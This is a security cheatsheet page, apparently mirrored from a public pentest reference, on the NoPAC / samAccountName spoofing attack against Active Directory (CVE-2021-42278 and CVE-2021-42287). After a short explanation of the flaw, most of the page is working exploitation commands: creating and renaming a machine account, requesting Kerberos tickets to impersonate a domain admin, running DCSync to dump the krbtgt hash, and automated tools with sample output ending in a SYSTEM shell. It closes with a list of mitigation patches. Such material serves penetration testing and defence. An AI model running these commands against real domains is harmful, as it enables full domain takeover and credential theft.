daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

nopac.md (9363B)


      1 ---
      2 title: "NoPAC / samAccountName Spoofing"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/CVE/NoPAC.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/CVE/NoPAC.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # NoPAC / samAccountName Spoofing
     12 
     13 During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found.
     14 
     15 An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'.
     16 
     17 For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'.
     18 An attacker would then create a machine account with the sAMAccountName set to 'DC'.
     19 
     20 The attacker can then request a TGT for the newly created machine account.
     21 
     22 After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC.
     23 
     24 The attacker can then perform S4U2Self and request a ST to itself as any user.
     25 
     26 Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid ST for the domain controller.
     27 
     28 **Requirements**:
     29 
     30 * MachineAccountQuota > 0
     31 
     32 **Check for exploitation**:
     33 
     34 * Check the MachineAccountQuota of the account
     35 
     36   ```powershell
     37   netexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ
     38   StandIn.exe --object ms-DS-MachineAccountQuota=*
     39   ```
     40 
     41 * Check if the DC is vulnerable
     42 
     43   ```powershell
     44   netexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac
     45   ```
     46 
     47 **Exploitation**:
     48 
     49 1. Create a computer account
     50 
     51     ```powershell
     52     impacket@linux> addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'
     53 
     54     powermad@windows> . .\Powermad.ps1
     55     powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force
     56     powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose
     57 
     58     sharpmad@windows> Sharpmad.exe MAQ -Action new -MachineAccount ControlledComputer -MachinePassword ComputerPassword
     59     ```
     60 
     61 2. Clear the controlled machine account `servicePrincipalName` attribute
     62 
     63     ```ps1
     64     krbrelayx@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
     65 
     66     powershell@windows> . .\Powerview.ps1
     67     powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose
     68     ```
     69 
     70 3. (CVE-2021-42278) Change the controlled machine account `sAMAccountName` to a Domain Controller's name without the trailing `$`
     71 
     72     ```ps1
     73     # https://github.com/SecureAuthCorp/impacket/pull/1224
     74     impacket@linux> renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'
     75 
     76     powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "DomainController" -Attribute samaccountname -Verbose
     77     ```
     78 
     79 4. Request a TGT for the controlled machine account
     80 
     81     ```ps1
     82     impacket@linux> getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'
     83 
     84     cmd@windows> Rubeus.exe asktgt /user:"DomainController" /password:"ComputerPassword" /domain:"domain.local" /dc:"DomainController.domain.local" /nowrap
     85     ```
     86 
     87 5. Reset the controlled machine account sAMAccountName to its old value
     88 
     89     ```ps1
     90     impacket@linux> renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'
     91 
     92     powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "ControlledComputer" -Attribute samaccountname -Verbose
     93     ```
     94 
     95 6. (CVE-2021-42287) Request a service ticket with `S4U2self` by presenting the TGT obtained before
     96 
     97     ```ps1
     98     # https://github.com/SecureAuthCorp/impacket/pull/1202
     99     impacket@linux> KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'
    100 
    101     cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT]
    102     ```
    103 
    104 7. DCSync
    105 
    106     ```ps1
    107     KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'
    108     ```
    109 
    110 Automated exploitation:
    111 
    112 * [cube0x0/noPac](https://github.com/cube0x0/noPac) - Windows
    113 
    114     ```powershell
    115     noPac.exe scan -domain htb.local -user user -pass 'password123'
    116     noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
    117     noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator
    118     ```
    119 
    120 * [Ridter/noPac](https://github.com/Ridter/noPac) - Linux
    121 
    122   ```ps1
    123   python noPac.py 'domain.local/user' -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0' -dc-ip 10.10.10.10 -use-ldap -dump
    124   ```
    125 
    126 * [WazeHell/sam-the-admin](https://github.com/WazeHell/sam-the-admin)
    127 
    128     ```ps1
    129     $ python3 sam_the_admin.py "domain/user:password" -dc-ip 10.10.10.10 -shell
    130     [*] Selected Target dc.caltech.white                                              
    131     [*] Total Domain Admins 11                                                        
    132     [*] will try to impersonat gaylene.dreddy                                         
    133     [*] Current ms-DS-MachineAccountQuota = 10                                        
    134     [*] Adding Computer Account "SAMTHEADMIN-11$"                                     
    135     [*] MachineAccount "SAMTHEADMIN-11$" password = EhFMT%mzmACL                      
    136     [*] Successfully added machine account SAMTHEADMIN-11$ with password EhFMT%mzmACL.
    137     [*] SAMTHEADMIN-11$ object = CN=SAMTHEADMIN-11,CN=Computers,DC=caltech,DC=white   
    138     [*] SAMTHEADMIN-11$ sAMAccountName == dc                                          
    139     [*] Saving ticket in dc.ccache                                                    
    140     [*] Resting the machine account to SAMTHEADMIN-11$                                
    141     [*] Restored SAMTHEADMIN-11$ sAMAccountName to original value                     
    142     [*] Using TGT from cache                                                          
    143     [*] Impersonating gaylene.dreddy                                                  
    144     [*]     Requesting S4U2self                                                       
    145     [*] Saving ticket in gaylene.dreddy.ccache                                        
    146     [!] Launching semi-interactive shell - Careful what you execute                   
    147     C:\Windows\system32>whoami                                                        
    148     nt authority\system 
    149     ```
    150 
    151 * [ly4k/Pachine](https://github.com/ly4k/Pachine)
    152 
    153     ```powershell
    154     usage: pachine.py [-h] [-scan] [-spn SPN] [-impersonate IMPERSONATE] [-domain-netbios NETBIOSNAME] [-computer-name NEW-COMPUTER-NAME$] [-computer-pass password] [-debug] [-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local]
    155                   [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] -dc-host hostname [-dc-ip ip]
    156                   [domain/]username[:password]
    157     $ python3 pachine.py -dc-host dc.domain.local -scan 'domain.local/john:Passw0rd!'
    158     $ python3 pachine.py -dc-host dc.domain.local -spn cifs/dc.domain.local -impersonate administrator 'domain.local/john:Passw0rd!'
    159     $ export KRB5CCNAME=$PWD/administrator@domain.local.ccache
    160     $ impacket-psexec -k -no-pass 'domain.local/administrator@dc.domain.local'
    161     ```
    162 
    163 **Mitigations**:
    164 
    165 * [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520)
    166 * [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9)
    167 * [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7)
    168 * [KB5007205 - Windows Server 2022](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007205-os-build-20348-350-af102e6f-cc7c-4cd4-8dc2-8b08d73d2b31)
    169 * [KB5008102](https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e)
    170 * [KB5008380](https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041)
    171 
    172 ## References
    173 
    174 * [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)